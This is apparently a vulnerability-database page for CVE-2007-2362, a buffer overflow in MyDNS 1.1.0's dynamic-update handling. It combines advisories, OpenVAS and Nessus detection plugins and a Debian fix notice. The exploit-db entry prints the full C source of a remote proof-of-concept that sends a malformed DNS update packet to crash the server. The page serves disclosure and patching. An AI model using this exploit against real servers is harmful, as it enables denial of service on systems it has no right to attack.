Search...

MyDNS DNS Update update.c Off-by-one Remote DoS

2007-04-27T10:33:52

ID OSVDB:35439
Type osvdb
Reporter OSVDB
Modified 2007-04-27T10:33:52

Description

No description provided by the source

References:

Secunia Advisory ID:25007 Related OSVDB ID: 35438 Other Solution URL: http://www.digit-labs.org/files/patches/mydns-update.c.diff Other Advisory URL: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0708.html ISS X-Force ID: 33933 FrSIRT Advisory: ADV-2007-1561 CVE-2007-2362 Bugtraq ID: 23694

JSON Vulners Source

Initial Source

{"href": "https://vulners.com/osvdb/OSVDB:35439", "id": "OSVDB:35439", "reporter": "OSVDB", "published": "2007-04-27T10:33:52", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25007](https://secuniaresearch.flexerasoftware.com/advisories/25007/)\n[Related OSVDB ID: 35438](https://vulners.com/osvdb/OSVDB:35438)\nOther Solution URL: http://www.digit-labs.org/files/patches/mydns-update.c.diff\nOther Advisory URL: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0708.html\nISS X-Force ID: 33933\nFrSIRT Advisory: ADV-2007-1561\n[CVE-2007-2362](https://vulners.com/cve/CVE-2007-2362)\nBugtraq ID: 23694\n", "title": "MyDNS DNS Update update.c Off-by-one Remote DoS", "lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "references": [], "edition": 1, "cvelist": ["CVE-2007-2362"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 6.8, "vector": "NONE", "modified": "2017-04-28T13:20:31", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2362"]}, {"type": "osvdb", "idList": ["OSVDB:35438"]}, {"type": "openvas", "idList": ["OPENVAS:60045"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1434.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:3807"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1434-1:61FC0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7646"]}], "modified": "2017-04-28T13:20:31", "rev": 2}, "vulnersScore": 6.8}, "modified": "2007-04-27T10:33:52"}

{"cve": [{"lastseen": "2021-02-02T05:31:23", "description": "Multiple buffer overflows in MyDNS 1.1.0 allow remote attackers to (1) cause a denial of service (daemon crash) and possibly execute arbitrary code via a certain update, which triggers a heap-based buffer overflow in update.c; and (2) cause a denial of service (daemon crash) via unspecified vectors that trigger an off-by-one stack-based buffer overflow in update.c.\nSuccessful exploitation requires update privileges and that \"allow-update\" is set to \"yes\" in mydns.conf.", "edition": 4, "cvss3": {}, "published": "2007-04-30T22:19:00", "title": "CVE-2007-2362", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2362"], "modified": "2017-07-29T01:31:00", "cpe": ["cpe:/a:don_moore:mydns:1.1.0"], "id": "CVE-2007-2362", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2362", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:don_moore:mydns:1.1.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-2362"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25007](https://secuniaresearch.flexerasoftware.com/advisories/25007/)\n[Related OSVDB ID: 35439](https://vulners.com/osvdb/OSVDB:35439)\nOther Solution URL: http://www.digit-labs.org/files/patches/mydns-update.c.diff\nOther Advisory URL: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-04/0708.html\nISS X-Force ID: 33933\nFrSIRT Advisory: ADV-2007-1561\n[CVE-2007-2362](https://vulners.com/cve/CVE-2007-2362)\nBugtraq ID: 23694\n", "edition": 1, "modified": "2007-04-27T10:33:52", "published": "2007-04-27T10:33:52", "href": "https://vulners.com/osvdb/OSVDB:35438", "id": "OSVDB:35438", "title": "MyDNS DNS Update update.c Remote Overflow", "type": "osvdb", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2362"], "description": "The remote host is missing an update to mydns\nannounced via advisory DSA 1434-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:60045", "href": "http://plugins.openvas.org/nasl.php?oid=60045", "type": "openvas", "title": "Debian Security Advisory DSA 1434-1 (mydns)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1434_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1434-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that in MyDNS, a domain name server with database\nbackend, the daemon could be crashed through malicious remote update\nrequests, which may lead to denial of service.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1:1.1.0-7etch1.\n\nThe old stable distribution (sarge) is not affected.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.0-8.\n\nWe recommend that you upgrade your mydns packages.\";\ntag_summary = \"The remote host is missing an update to mydns\nannounced via advisory DSA 1434-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201434-1\";\n\nif(description)\n{\n script_id(60045);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-2362\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1434-1 (mydns)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mydns-mysql\", ver:\"1.1.0-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mydns-pgsql\", ver:\"1.1.0-7etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T19:20:58", "description": "MyDNS 1.1.0 Remote Heap Overflow PoC. CVE-2007-2362. Dos exploit for linux platform", "published": "2007-04-27T00:00:00", "type": "exploitdb", "title": "MyDNS 1.1.0 - Remote Heap Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2362"], "modified": "2007-04-27T00:00:00", "id": "EDB-ID:3807", "href": "https://www.exploit-db.com/exploits/3807/", "sourceData": "/* mydns-rr-smash.c\n *\n * Copyright (c) 2007 by <mu-b@digit-labs.org>\n *\n * mydns remote exploit PoC (x86-lnx)\n * by mu-b - Apr 2007\n *\n * - Tested on: mydns-1.1.0 (.tar.gz)\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; version 2 of the License.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <netdb.h>\n\n#define BUF_SIZE 512\n#define NOP 0x41\n\n#define DEF_PORT 53\n#define PORT_DNS DEF_PORT\n\nstatic void sock_send_udp (u_char * host, int port, u_char * src, int len);\nstatic void zbuffami (u_char * zbuf, u_char *domain);\n\nstatic void\nsock_send_udp (u_char * host, int port, u_char * src, int len)\n{\n struct sockaddr_in address;\n struct hostent *hp;\n int sock;\n\n fflush (stdout);\n if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)\n {\n perror (\"socket()\");\n exit (-1);\n }\n\n if ((hp = gethostbyname (host)) == NULL)\n {\n perror (\"gethostbyname()\");\n exit (-1);\n }\n\n memset (&address, 0, sizeof (address));\n memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);\n address.sin_family = AF_INET;\n address.sin_port = htons (port);\n\n sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));\n}\n\nstatic void\nzbuffami (u_char * zbuf, u_char *domain)\n{\n u_char *ptr, *bgn, *end;\n\n ptr = zbuf;\n *ptr++ = 0x69; /* transaction id */\n *ptr++ = 0x69;\n *ptr++ = 0x28; /* flags */\n *ptr++ = 0x80;\n *ptr++ = 0x00; /* number of questions */\n *ptr++ = 0x01;\n *ptr++ = 0x00; /* number of answers */\n *ptr++ = 0x01;\n *ptr++ = 0x00; /* number of authority rr's */\n *ptr++ = 0x01;\n *ptr++ = 0x00; /* number of additional rr's */\n *ptr++ = 0x00;\n\n /* question */\n bgn = strtok (domain, \".\");\n while (bgn != NULL)\n {\n unsigned int len;\n\n len = strlen (bgn);\n *ptr++ = len;\n memcpy (ptr, bgn, len);\n ptr += len;\n\n bgn = strtok (NULL, \".\");\n }\n *ptr++ = 0x00; /* terminate name */\n\n *ptr++ = 0x00; /* type */\n *ptr++ = 0x06;\n *ptr++ = 0xff; /* class */\n *ptr++ = 0xff;\n\n /* update */\n *ptr++ = 0x00; /* . */\n *ptr++ = 0x00; /* rr->type */\n *ptr++ = 0x00;\n *ptr++ = 0x00; /* rr->class */\n *ptr++ = 0x01;\n *ptr++ = 0xff; /* rr->ttl */\n *ptr++ = 0xff;\n *ptr++ = 0xff;\n *ptr++ = 0xff;\n *ptr++ = 0xff; /* rr->rdlength */\n *ptr++ = 0xff;\n\n /* rrdata */\n printf (\"NOP: %d\\n\", BUF_SIZE - (ptr - zbuf));\n memset (ptr, NOP, BUF_SIZE - (ptr - zbuf));\n}\n\nint\nmain (int argc, char **argv)\n{\n int sock;\n u_char zbuf[BUF_SIZE];\n\n printf (\"mydns <= 1.1.0 remote exploit PoC\\n\"\n \"by: <mu-b@digit-labs.org>\\n\"\n\t \"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\\n\\n\");\n\n if (argc <= 2)\n {\n fprintf (stderr, \"Usage: %s <host> <update-domain>\\n\", argv[0]);\n exit (EXIT_SUCCESS);\n }\n\n printf (\"+Attacking to %s...\\n\", argv[1]);\n\n printf (\"+Building evil query...\");\n memset (zbuf, 0x00, sizeof (zbuf));\n zbuffami (zbuf, argv[2]);\n printf (\" done\\n\");\n\n printf (\"+Sending Payload...\");\n sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);\n printf (\" done\\n\");\n sleep (1);\n\n return (EXIT_SUCCESS);\n}\n\n// milw0rm.com [2007-04-27]\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3807/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-2362"], "description": "Heap buffer overflow on dynamic DNS update request parsing.", "edition": 1, "modified": "2007-04-28T00:00:00", "published": "2007-04-28T00:00:00", "id": "SECURITYVULNS:VULN:7646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7646", "title": "MyDNS buffer overflow", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:23:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2362"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1434-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nDecember 16, 2007 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : mydns\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2007-2362\n\nIt was discovered that in MyDNS, a domain name server with database\nbackend, the daemon could be crashed through malicious remote update\nrequests, which may lead to denial of service.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1:1.1.0-7etch1.\n\nThe old stable distribution (sarge) is not affected.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.1.0-8.\n\nWe recommend that you upgrade your mydns packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian 4.0 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.dsc\n Size/MD5 checksum: 1016 6d0a22d23d6a218b2f6c36a0973fec29\n http://security.debian.org/pool/updates/main/m/mydns/mydns_1.1.0-7etch1.diff.gz\n Size/MD5 checksum: 23201 68288d6559240f652b363175077ee372\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_alpha.deb\n Size/MD5 checksum: 283646 605abae7c94de5d29b3c0b2e627ba3de\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_alpha.deb\n Size/MD5 checksum: 276524 2ba115052634baec10286c91a5cc6ce6\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_amd64.deb\n Size/MD5 checksum: 261562 fb735c256a150474a83b162823817666\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_amd64.deb\n Size/MD5 checksum: 254146 57ff5991069034d7c97be430b8149aaa\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_arm.deb\n Size/MD5 checksum: 244500 8361e2dfe50de8abb41d97c0bde6c8fa\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_arm.deb\n Size/MD5 checksum: 233926 3410cf9b02fea32800f7273b0db312c3\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_hppa.deb\n Size/MD5 checksum: 259956 dd54add61133e98ca326ffbba9d45491\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_hppa.deb\n Size/MD5 checksum: 267084 d457000b6afc8dcf160e06f91e5449d8\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_i386.deb\n Size/MD5 checksum: 249396 a0d5f307f3eedfc6c85a587cc5572463\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_i386.deb\n Size/MD5 checksum: 241112 a2ef881adaf58f206315b6843f6e0f0f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_ia64.deb\n Size/MD5 checksum: 336738 80c0da6e223de21d5d13ee34667c17ec\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_ia64.deb\n Size/MD5 checksum: 342716 4f95f73ebe81ae596edeae7145a55be9\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mips.deb\n Size/MD5 checksum: 257376 e607aff2b4d31066337d10a6168831a8\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mips.deb\n Size/MD5 checksum: 264792 c1f711aa974118740dd077078004a0bc\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_mipsel.deb\n Size/MD5 checksum: 257854 10b2f0d2ad613f24d9a1a316fd5c3699\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_mipsel.deb\n Size/MD5 checksum: 265208 ec23fa6fb9fcd9c2422ff61838b65a04\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_powerpc.deb\n Size/MD5 checksum: 257796 7e94fa5255766b49edf123c1e1546aa0\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_powerpc.deb\n Size/MD5 checksum: 265724 d59b359ac1d764bb57963ee2f962e7ce\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_s390.deb\n Size/MD5 checksum: 259718 fe3cb919cd468a1ad1bec7e713985087\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_s390.deb\n Size/MD5 checksum: 251832 f9873c503c9bb69c4394462f50046caf\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mydns/mydns-mysql_1.1.0-7etch1_sparc.deb\n Size/MD5 checksum: 242156 7dd509904242e7843649db676bb1c473\n http://security.debian.org/pool/updates/main/m/mydns/mydns-pgsql_1.1.0-7etch1_sparc.deb\n Size/MD5 checksum: 232728 070e9127edf6b7b30cd6fc8927b63fc8\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2007-12-16T21:18:35", "published": "2007-12-16T21:18:35", "id": "DEBIAN:DSA-1434-1:61FC0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00216.html", "title": "[SECURITY] [DSA 1434-1] New mydns packages fix denial of service", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:44:53", "description": "It was discovered that in MyDNS, a domain name server with database\nbackend, the daemon could be crashed through malicious remote update\nrequests, which may lead to denial of service.", "edition": 26, "published": "2007-12-17T00:00:00", "title": "Debian DSA-1434-1 : mydns - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2362"], "modified": "2007-12-17T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:mydns"], "id": "DEBIAN_DSA-1434.NASL", "href": "https://www.tenable.com/plugins/nessus/29707", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1434. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29707);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-2362\");\n script_bugtraq_id(23694);\n script_xref(name:\"DSA\", value:\"1434\");\n\n script_name(english:\"Debian DSA-1434-1 : mydns - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that in MyDNS, a domain name server with database\nbackend, the daemon could be crashed through malicious remote update\nrequests, which may lead to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1434\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mydns packages.\n\nThe old stable distribution (sarge) is not affected.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 1:1.1.0-7etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mydns\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"mydns-mysql\", reference:\"1:1.1.0-7etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"mydns-pgsql\", reference:\"1:1.1.0-7etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}